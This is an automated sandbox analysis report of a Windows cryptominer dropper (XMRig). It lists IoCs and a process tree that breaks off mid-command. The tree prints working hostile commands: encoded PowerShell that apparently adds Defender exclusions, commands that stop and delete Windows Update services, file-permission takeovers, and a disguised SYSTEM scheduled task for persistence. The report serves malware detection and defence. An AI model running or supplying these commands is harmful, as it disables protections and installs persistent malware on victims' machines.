Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
17-03-2023 07:57
Static task
static1
Behavioral task
behavioral1
Sample
fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe
Resource
win7-20230220-en
General
-
Target
fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe
-
Size
4.3MB
-
MD5
ccaffcd12dcb30adb5250f30026ecd1e
-
SHA1
4048dc71db497f641a4f35eb00ac3c163c394978
-
SHA256
fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa
-
SHA512
a196e58aaff3f68e15df0de667541d103c78d0f8cf114ff3f5770444de1a30b0dc46c4d0dcafbc8bd81538660d401c57dc18de8b6b3769b81cc4e8ff7f316286
-
SSDEEP
98304:w1XNI4kmUg+DgxP1Wrj3DIIs0LHhjwSKVjV3:w9NInmUg5xqX/sCHhj7K5p
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/672-197-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/672-200-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/672-201-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/672-203-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/672-204-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/672-205-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/672-206-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/672-207-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/672-208-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/672-210-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/672-219-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/672-220-0x0000000140000000-0x0000000140803000-memory.dmp xmrig -
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 1904 icacls.exe 2344 takeown.exe 3412 icacls.exe 5016 takeown.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
Processes:
services.exepid process 1228 services.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 3412 icacls.exe 5016 takeown.exe 1904 icacls.exe 2344 takeown.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
conhost.exedescription pid process target process PID 2408 set thread context of 984 2408 conhost.exe conhost.exe PID 2408 set thread context of 672 2408 conhost.exe svchost.exe -
Drops file in Program Files directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Program Files\Windows\services.exe conhost.exe File opened for modification C:\Program Files\Windows\services.exe conhost.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4552 sc.exe 4996 sc.exe 3792 sc.exe 648 sc.exe 492 sc.exe 1104 sc.exe 4248 sc.exe 2308 sc.exe 1576 sc.exe 4032 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 55 IoCs
Processes:
powershell.exesvchost.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 4168 reg.exe 3740 reg.exe 3156 reg.exe 3412 reg.exe 1856 reg.exe 4728 reg.exe 2372 reg.exe 3972 reg.exe 2056 reg.exe 3776 reg.exe 5052 reg.exe 928 reg.exe 4304 reg.exe 4796 reg.exe 3820 reg.exe 2356 reg.exe 3328 reg.exe 660 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exesvchost.exepid process 3164 powershell.exe 3164 powershell.exe 1092 conhost.exe 2952 powershell.exe 2952 powershell.exe 2408 conhost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe 672 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 676 -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.execonhost.exetakeown.exepowershell.execonhost.exetakeown.exesvchost.exedescription pid process Token: SeDebugPrivilege 3164 powershell.exe Token: SeDebugPrivilege 1092 conhost.exe Token: SeTakeOwnershipPrivilege 5016 takeown.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2408 conhost.exe Token: SeTakeOwnershipPrivilege 2344 takeown.exe Token: SeLockMemoryPrivilege 672 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.execonhost.execmd.execmd.execmd.execmd.exeservices.exedescription pid process target process PID 1328 wrote to memory of 1092 1328 fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe conhost.exe PID 1328 wrote to memory of 1092 1328 fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe conhost.exe PID 1328 wrote to memory of 1092 1328 fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe conhost.exe PID 1092 wrote to memory of 3980 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 3980 1092 conhost.exe cmd.exe PID 3980 wrote to memory of 3164 3980 cmd.exe powershell.exe PID 3980 wrote to memory of 3164 3980 cmd.exe powershell.exe PID 1092 wrote to memory of 700 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 700 1092 conhost.exe cmd.exe PID 700 wrote to memory of 4552 700 cmd.exe sc.exe PID 700 wrote to memory of 4552 700 cmd.exe sc.exe PID 700 wrote to memory of 4996 700 cmd.exe sc.exe PID 700 wrote to memory of 4996 700 cmd.exe sc.exe PID 700 wrote to memory of 1104 700 cmd.exe sc.exe PID 700 wrote to memory of 1104 700 cmd.exe sc.exe PID 700 wrote to memory of 3792 700 cmd.exe sc.exe PID 700 wrote to memory of 3792 700 cmd.exe sc.exe PID 700 wrote to memory of 4248 700 cmd.exe sc.exe PID 700 wrote to memory of 4248 700 cmd.exe sc.exe PID 700 wrote to memory of 2372 700 cmd.exe reg.exe PID 700 wrote to memory of 2372 700 cmd.exe reg.exe PID 1092 wrote to memory of 5000 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 5000 1092 conhost.exe cmd.exe PID 700 wrote to memory of 928 700 cmd.exe reg.exe PID 700 wrote to memory of 928 700 cmd.exe reg.exe PID 700 wrote to memory of 3412 700 cmd.exe reg.exe PID 700 wrote to memory of 3412 700 cmd.exe reg.exe PID 700 wrote to memory of 2356 700 cmd.exe reg.exe PID 700 wrote to memory of 2356 700 cmd.exe reg.exe PID 5000 wrote to memory of 2268 5000 cmd.exe schtasks.exe PID 5000 wrote to memory of 2268 5000 cmd.exe schtasks.exe PID 700 wrote to memory of 4304 700 cmd.exe reg.exe PID 700 wrote to memory of 4304 700 cmd.exe reg.exe PID 700 wrote to memory of 5016 700 cmd.exe takeown.exe PID 700 wrote to memory of 5016 700 cmd.exe takeown.exe PID 700 wrote to memory of 1904 700 cmd.exe icacls.exe PID 700 wrote to memory of 1904 700 cmd.exe icacls.exe PID 700 wrote to memory of 3328 700 cmd.exe reg.exe PID 700 wrote to memory of 3328 700 cmd.exe reg.exe PID 700 wrote to memory of 4796 700 cmd.exe reg.exe PID 700 wrote to memory of 4796 700 cmd.exe reg.exe PID 700 wrote to memory of 1856 700 cmd.exe reg.exe PID 700 wrote to memory of 1856 700 cmd.exe reg.exe PID 700 wrote to memory of 4728 700 cmd.exe reg.exe PID 700 wrote to memory of 4728 700 cmd.exe reg.exe PID 700 wrote to memory of 3904 700 cmd.exe schtasks.exe PID 700 wrote to memory of 3904 700 cmd.exe schtasks.exe PID 700 wrote to memory of 1128 700 cmd.exe schtasks.exe PID 700 wrote to memory of 1128 700 cmd.exe schtasks.exe PID 700 wrote to memory of 2236 700 cmd.exe schtasks.exe PID 700 wrote to memory of 2236 700 cmd.exe schtasks.exe PID 700 wrote to memory of 4948 700 cmd.exe schtasks.exe PID 700 wrote to memory of 4948 700 cmd.exe schtasks.exe PID 700 wrote to memory of 4988 700 cmd.exe schtasks.exe PID 700 wrote to memory of 4988 700 cmd.exe schtasks.exe PID 700 wrote to memory of 1796 700 cmd.exe schtasks.exe PID 700 wrote to memory of 1796 700 cmd.exe schtasks.exe PID 700 wrote to memory of 3720 700 cmd.exe schtasks.exe PID 700 wrote to memory of 3720 700 cmd.exe schtasks.exe PID 1092 wrote to memory of 5020 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 5020 1092 conhost.exe cmd.exe PID 5020 wrote to memory of 4212 5020 cmd.exe schtasks.exe PID 5020 wrote to memory of 4212 5020 cmd.exe schtasks.exe PID 1228 wrote to memory of 2408 1228 services.exe conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3164 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:4552 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:4996 -
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:1104 -
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:3792 -
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:4248 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:2372 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:928 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
PID:3412 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:2356 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:4304 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5016 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1904 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:3328 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:4796 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1856 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:4728 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:3904
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:1128
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:2236
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:4948
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:4988
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:1796
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:3720
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"4⤵
- Creates scheduled task(s)
PID:2268 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵PID:4212
-
C:\Program Files\Windows\services.exe"C:\Program Files\Windows\services.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"3⤵PID:1516
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN 